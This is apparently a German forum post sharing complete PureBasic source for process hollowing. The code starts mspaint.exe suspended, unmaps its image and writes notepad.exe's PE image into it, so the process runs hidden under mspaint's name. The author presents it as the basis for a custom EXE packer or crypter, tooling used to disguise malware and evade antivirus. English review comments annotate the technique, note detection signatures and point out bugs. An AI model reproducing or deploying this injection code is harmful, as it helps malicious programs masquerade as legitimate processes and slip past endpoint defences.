Also, ich sitze nun seit Tagen daran, diesen Code zu übersetzen, und es sieht so aus, als hätte ich es nun geschafft :P Funktioniert zumindest bei mir problemlos! Jetzt steht dem eigenen EXE-Packer oder Crypter nichts mehr im Weg!
Dieser Code hier liest Notepad ganz normal in einen Buffer ein und startet ihn dann; allerdings wird er im Task-Manager als mspaint.exe angezeigt, da man dafür einen Host-Prozess benötigt.
; Prototype for ntdll's ZwUnmapViewOfSection(ProcessHandle, BaseAddress).
; The function is looked up by name at runtime with GetProcAddress_ rather
; than linked statically; the resulting pointer is stored in a global and
; called later to remove the host process's own image from memory.
; NOTE(review): GetProcAddress_ can return 0 if the export is not found;
; the result is used unchecked below.
Prototype.l ZwUnmapViewOfSectionPT(Processhandle.l,BaseAdress.l)
ntdll = GetModuleHandle_("ntdll.dll")
Global ZwUnmapViewOfSection_.ZwUnmapViewOfSectionPT = GetProcAddress_(ntdll,"ZwUnmapViewOfSection")
; PureBasic mirror of the PE IMAGE_SECTION_HEADER (40 bytes in total:
; an 8-byte name, a 4-byte union, six longs and two words). It is used
; as an overlay on the section table that follows the optional header,
; so the field order and sizes must match the on-disk layout exactly.
Structure IMAGE_SECTION_HEADER
Name.b[8]
StructureUnion
PhysicalAddress.l
VirtualSize.l
EndStructureUnion
VirtualAddress.l
SizeOfRawData.l
PointerToRawData.l
PointerToRelocations.l
PointerToLinenumbers.l
NumberOfRelocations.w
NumberOfLinenumbers.w
Characteristics.l
EndStructure
; injectfile: starts lpProcessname as a suspended host process, unmaps the
; host's own image, copies the PE image held at lpBuffer into the host at
; that image's preferred base, points the primary thread's entry at the new
; image and resumes it. This call sequence (CreateProcess with
; CREATE_SUSPENDED -> ZwUnmapViewOfSection -> VirtualAllocEx/WriteProcessMemory
; -> SetThreadContext -> ResumeThread) is the pattern known as process
; hollowing. It is also exactly the sequence endpoint detection keys on, and
; it leaves a running process whose in-memory image no longer matches the
; file it was started from (the basis of memory-vs-disk image comparisons).
; Parameters:
;   lpProcessname.s - path of the executable to start as the host
;   lpBuffer.l      - address of a buffer holding a complete PE file image
; Returns: nothing. Result is only a local and there is no ProcedureReturn,
; so the caller cannot tell whether the injection succeeded.
Procedure injectfile(lpProcessname.s, lpBuffer.l)
;Declare
; Overlay type for indexing the section table; NumberOfSections is never
; checked against the 95 entries declared here.
Structure IMAGE_SECTION_HEADERS
a.IMAGE_SECTION_HEADER[95]
EndStructure
Result.l = 0
Startupinfo.STARTUPINFO
ProcessInfo.PROCESS_INFORMATION
Context.CONTEXT
BaseAddress.l
lpNumberOfBytesRead.l
lpNumberOfBytesWritten.w
*NtHeaders.IMAGE_NT_HEADERS
*Sections.IMAGE_SECTION_HEADERS
i.l
;---
Result = #False
; Zero STARTUPINFO and ask for a visible window for the host process.
ZeroMemory_(@StartupInfo, SizeOf(STARTUPINFO));
StartupInfo\cb = SizeOf(STARTUPINFO)
StartupInfo\dwFlags = #STARTF_USESHOWWINDOW
StartupInfo\wShowWindow = #SW_SHOW
; The host is created suspended: its primary thread has not run yet, which is
; what allows the image swap and the context rewrite below.
If CreateProcess_(#NUL,lpProcessname,#NUL,#NUL,#False,#CREATE_SUSPENDED,#NUL,#NUL,StartupInfo,@ProcessInfo)
; Fetch the integer registers of the suspended primary thread.
Context\ContextFlags = #CONTEXT_INTEGER
GetThreadContext_(ProcessInfo\hThread, Context);
; Ebx+8 is read here and rewritten at the end with the new base, i.e. it is
; treated as the slot holding the host's image base (on x86 the initial
; thread's Ebx holds the PEB pointer and offset 8 is ImageBaseAddress).
ReadProcessMemory_(ProcessInfo\hProcess,Context\Ebx+8,@BaseAddress,SizeOf(BaseAddress),@lpNumberOfBytesRead)
; Unmap the host's original image. ">= 0" accepts any non-negative NTSTATUS
; as success. On the failure branch nothing is cleaned up: the suspended host
; process and both handles are left behind.
If ZwUnmapViewOfSection_(ProcessInfo\hProcess,BaseAddress) >= 0
; Walk the PE in the buffer: DOS header at offset 0, NT headers at e_lfanew.
*adr.IMAGE_DOS_HEADER = lpBuffer
*NtHeaders = lpBuffer + *adr\e_lfanew
; Reserve and commit the whole image at its preferred ImageBase in the host.
; The return value is not checked, and no relocation processing exists in
; this procedure, so the image is only ever placed at that preferred base.
BaseAddress = VirtualAllocEx_(ProcessInfo\hProcess,*NtHeaders\OptionalHeader\ImageBase,*NtHeaders\OptionalHeader\SizeOfImage,#MEM_RESERVE | #MEM_COMMIT, #PAGE_READWRITE)
; Copy the headers, then each section's raw data to its virtual address.
WriteProcessMemory_(ProcessInfo\hProcess,BaseAddress,lpBuffer,*NtHeaders\OptionalHeader\SizeOfHeaders,@lpNumberOfBytesWritten)
; The section table starts right after the optional header.
*Sections = @*NtHeaders\OptionalHeader + *NtHeaders\FileHeader\SizeOfOptionalHeader
For i = 0 To *NtHeaders\FileHeader\NumberOfSections-1
WriteProcessMemory_(ProcessInfo\hProcess,BaseAddress+*Sections\a[i]\VirtualAddress,lpBuffer+*Sections\a[i]\PointerToRawData,*Sections\a[i]\SizeOfRawData,@lpNumberOfBytesWritten)
Next
; Store the new image base back into the slot read above.
WriteProcessMemory_(ProcessInfo\hProcess,Context\Ebx+8,@BaseAddress,SizeOf(BaseAddress),@lpNumberOfBytesWritten)
; Redirect the thread's Eax (entry point register at thread start on x86)
; to the injected image's AddressOfEntryPoint and apply the new context.
Context\Eax = BaseAddress + *NtHeaders\OptionalHeader\AddressOfEntryPoint
Result = SetThreadContext_(ProcessInfo\hThread, Context)
If Result
; Success: the host now runs the injected image. Note that the process and
; thread handles in ProcessInfo are not closed on this path.
ResumeThread_(ProcessInfo\hThread)
Else
; SetThreadContext failed: kill the half-rewritten host and release handles.
TerminateProcess_(ProcessInfo\hProcess, 0);
CloseHandle_(ProcessInfo\hProcess)
CloseHandle_(ProcessInfo\hThread)
EndIf
EndIf
EndIf
EndProcedure
; Driver: read notepad.exe from disk into a memory buffer using PureBasic
; file number 0, then hand the buffer to injectfile with mspaint.exe as the
; host. The resulting process shows up as mspaint.exe (its name and on-disk
; file) while executing notepad's image in memory.
; NOTE(review): if ReadFile fails, `buffer` is never assigned and injectfile
; is still called with it; AllocateMemory's result is also not checked.
If ReadFile(0,"C:\Windows\System32\notepad.exe")
buffer = AllocateMemory(Lof(0)) ; Datei ganz normal in einen buffer lesen (read the whole file into a buffer)
ReadData(0,buffer,Lof(0))
CloseFile(0)
EndIf
injectfile("C:\Windows\System32\mspaint.exe",buffer) ; nun führen wir den buffer im addressraum von paint aus! (run the buffer inside paint's address space)
Grüße, MySelf